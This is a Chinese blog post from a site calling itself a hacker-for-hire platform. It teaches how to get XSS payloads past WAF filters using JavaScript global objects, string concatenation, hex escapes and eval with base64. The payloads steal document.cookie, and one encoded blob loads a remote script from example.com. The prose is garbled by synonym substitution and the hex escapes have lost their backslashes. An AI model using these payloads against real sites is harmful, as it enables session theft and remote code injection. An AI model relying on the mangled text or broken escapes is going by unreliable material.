*** 变异小技巧:使用JavaScript全局变量绕过XSS过滤器-黑客接单平台

访客5年前黑客资讯817
什么是JavaScript大局变量? JavaScript大局变量在函数外部声明或运用window方针声明,它能够经过任何函数拜访。 假定你的方针Web应用程序简单遭到映射到JavaScript字符串或JavaScript函数中的XSS的攻。 例如,下面的PHP脚本: echo " var message = 'Hello ".$_GET["name"]."'; alert(message); "; 如你所见,name参数简单遭到进犯,但是在这个示例中,假定Web应用程序有一个过滤器,它阻挠运用正则表达式(如/document[^.]*.[^.]*cookie/)阻挠将“document.cookie”字符串用于任何用户输入,让咱们来看看以下有效载荷: 在这种情况下,能够运用JavaScript大局变量来绕过它。咱们有许多办法能够从window或self方针拜访document.cookie。例如,例如,像window["document"]["cookie"]这样的方针就不会被阻挠。 从上面的示例中能够看出,你乃至能够运用self["alert"]("foo")这样的语法拜访任何JavaScript函数,该函数等于alert("foo");,这种语法为你供给了许多绕过弱过滤器的办法。明显,你简直能够在任何地方运用相似的语法,例如: (/* this is a comment */self/* foo */)[/*bar*/"alert"/**/]("yo") 关于“self”方针 Window.self只读特点回来窗口自身,作为WindowProxy,它能够与窗口方针(即window.self)或独立方针(self)上的点符号一同运用。独立符号的长处是关于非窗口上下文存在相似的表明法,例如在Web Workers中。经过运用self,你不只能够在窗口上下文(self将解析为window.self)的 *** 中引证大局规模,并且还能够在运转上下文(self将解析为WorkerGlobalScope.self)中引证。 你能够从以下方位调用任何JavaScript函数: • window • self • _self • this • top • parent • frames 小技巧1.衔接和十六进制转义序列(Escape Sequence) 绕过WAF规矩的最常见技能便是在或许的情况下运用字符串衔接。关于RCE来说也是如此,即便关于SQLi和JavaScript也是如此。 有许多WAF运用根据JavaScript函数名列表的过滤器,其间许多过滤器会阻挠包括比如alert()或String.fromCharCode()之类的字符串的恳求。因为大局变量,咱们能够运用字符串衔接或十六进制转义序列轻松绕过它们。例如: /* ** alert(document.cookie); */ self["ale"+"rt"](self["doc"+"ument"]["coo"+"kie"]) 绕过过滤器的更杂乱的语法是用十六进制转义序列替换字符串,字符代码小于256的任何字符都能够运用其十六进制表明转义,并运用x转义序列: > console.log("x68x65x6cx6cx6fx2cx20x77x6fx72x6cx64x21") 明显,将“alert”、“document”和“cookie”字符串替换为它们的十六进制表明,能够调用前面看到的大局变量中的任何函数: /* ** alert(document.cookie) */ self["x61x6cx65x72x74"]( self["x64x6fx63x75x6dx65x6ex74"] ["x63x6fx6fx6bx69x65"] ) 小技巧2. Eval和Base64编码的字符串 假如WAF要过滤咱们的输入内容,那么最困难的工作之一便是动态创立并增加一个调用长途JavaScript文件(相似于 Base64和eval()能够协助咱们,特别是假如咱们能够防止将“eval”字符串作为用户输入发送的话。看一下下面的比如: self["x65x76x61x6c"]( self["x61x74x6fx62"]( "dmFyIGhlYWQgPSBkb2N1bWVudC5nZXRFbGVtZW50 c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCk7dmFyI HNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn QoJ3NjcmlwdCcpO3NjcmlwdC5zZXRBdHRyaWJ1dGU oJ3R5cGUnLCAndGV4dC9qYXZhc2NyaXB0Jyk7c2Ny aXB0LnNldEF0dHJpYnV0ZSgnc3JjJywgJ2h0dHA6L y9leGFtcGxlLmNvbS9teS5qcycpO2hlYWQuYXBwZW 5kQ2hpbGQoc2NyaXB0KTs="[1][2]黑客接单网

相关文章

一个登陆框引起的血案

客户给的测验规模,或许挖众测时,许多时分都只要一个简略的登陆框,想起最初的苦逼的我,只能去测测爆炸弱口令,并且仍是指定用户名爆炸暗码这种,当真是苦不堪言; 文章内容很简略,可是仍是想共享一波,送给向我...

自己着手打造Fiddler挖洞插件

关于一个Web开发人员来说,Fiddler并不生疏。作为一款Web调试利器,它具有强壮的调试功用,灵敏的装备以及丰厚的可扩展功用。我在开发工作中,最喜爱的便是它的Inspectors和AutoResp...

利用PHP解析字符串函数parse_str的特性来绕过IDS、IPS和WAF-黑客接单平台

众所周知,PHP将查询字符串(在URL或正文中)转换为$_GET或$_POST中的相关数组。例如:/ ?foo=bar被转换为Array([foo] => "bar")。查询字符串解析进程运用下...

代码审计之Fiyo CMS事例共享

Fiyo CMS是小型的商务电话服务及移动协作东西,由一名前职业学校学生初次开发和创立的,后者其时在RPL的SMK 10三宝垄学习。 那时他的姓名不是Fiyo CMS,而是Sirion,它是Site...

那些年咱们学过的PHP黑魔法

序 这儿有必要得说一下==和===这俩货的重要性。==是比较运算,它不会去查看条件式的表达式的类型===是恒等,它会查看查表达式的值与类型是否持平NULL,0,”0″,array()运用==和fals...

浏览器进犯结构BeEF Part 5:进犯Web使用与进犯网络

前语 上一章介绍了Tunneling Proxy技能以及怎样运用这项技能来绕过httponly完成高档的会话盗取。本章评论如安在不违背SOP情况下,经过勾连浏览器进犯Web运用与进犯网络。其中有一些进...